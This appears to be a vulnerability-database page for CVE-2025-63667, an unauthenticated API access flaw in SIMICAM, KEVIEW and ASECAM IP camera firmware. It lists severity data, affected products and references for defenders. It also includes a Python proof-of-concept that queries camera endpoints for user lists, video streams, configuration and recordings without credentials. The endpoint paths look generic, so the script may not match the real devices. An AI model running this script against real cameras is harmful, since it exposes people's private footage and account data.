CVE-2025-63667

Description

Incorrect access control in SIMICAM v1.16.41-20250725, KEVIEW v1.14.92-20241120, ASECAM v1.14.10-20240725 allows attackers to access sensitive API endpoints without authentication.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:simicam:ip_camera_firmware:1.16.41:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:simicam:ip_camera:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:keview:ip_camera_firmware:1.14.92:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:keview:ip_camera:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:asecam:ip_camera_firmware:1.14.10:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:asecam:ip_camera:-:*:*:*:*:*:*:* - NOT VULNERABLE

SIMICAM < v1.16.41-20250725

KEVIEW < v1.14.92-20241120

ASECAM < v1.14.10-20240725

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-63667 PoC - Unauthenticated API Access
# Target: SIMICAM, KEVIEW, ASECAM devices
# This PoC demonstrates accessing sensitive API endpoints without authentication

import requests
import sys

def exploit(target_ip, target_port=80):
    base_url = f"http://{target_ip}:{target_port}"
    
    # Sensitive API endpoints that should require authentication
    api_endpoints = [
        "/api/device/info",
        "/api/user/list",
        "/api/camera/streams",
        "/api/config/system",
        "/api/recording/files"
    ]
    
    print(f"[*] Testing CVE-2025-63667 on {target_ip}:{target_port}")
    print(f"[*] Target: SIMICAM/KEVIEW/ASECAM with incorrect access control\n")
    
    for endpoint in api_endpoints:
        try:
            url = base_url + endpoint
            # No authentication headers - exploiting the vulnerability
            response = requests.get(url, timeout=10)
            
            if response.status_code == 200:
                print(f"[+] VULNERABLE: {endpoint}")
                print(f"[+] Status: {response.status_code}")
                print(f"[+] Response: {response.text[:200]}...\n")
            else:
                print(f"[-] Protected: {endpoint} (Status: {response.status_code})")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {endpoint}: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-63667.py <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63667
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63667
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63667/
[4] VulDB https://vuldb.com/cve/CVE-2025-63667
[5] https://github.com/Remenis/CVE-2025-63667
[6] https://github.com/Remenis/Vatilon_evidence/releases/download/Evidence/Vatilon_vulnerability_evidence_2025.zip
[7] https://vatilon.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63667", "sourceIdentifier": "[email protected]", "published": "2025-11-12T15:15:38.697", "lastModified": "2026-01-05T18:15:44.237", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in SIMICAM v1.16.41-20250725, KEVIEW v1.14.92-20241120, ASECAM v1.14.10-20240725 allows attackers to access sensitive API endpoints without authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:simicam:ip_camera_firmware:1.16.41:*:*:*:*:*:*:*", "matchCriteriaId": "84F453B8-FF6B-4C20-99C8-CDEB8DD347C0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:simicam:ip_camera:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2D14D6E-C3DC-4405-9055-347C854C3171"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:keview:ip_camera_firmware:1.14.92:*:*:*:*:*:*:*", "matchCriteriaId": "C9C8A18F-AC22-4F20-B8D5-3FA95B82667D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:keview:ip_camera:-:*:*:*:*:*:*:*", "matchCriteriaId": "B956FEBC-3EB8-4BA7-970C-720B18F7345F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asecam:ip_camera_firmware:1.14.10:*:*:*:*:*:*:*", "matchCriteriaId": "6F1AE14F-2E7A-45FE-BCE3-06AEC8C9519A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:asecam:ip_camera:-:*:*:*:*:*:*:*", "matchCriteriaId": "A1A3A3DC-2B24-4A13-9169-E18B585D29E8"}]}]}], "references": [{"url": "https://github.com/Remenis/CVE-2025-63667", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory"]}, {"url": "https://github.com/Remenis/Vatilon_evidence/releases/download/Evidence/Vatilon_vulnerability_evidence_2025.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://vatilon.com/", "source": "[email protected]"}]}}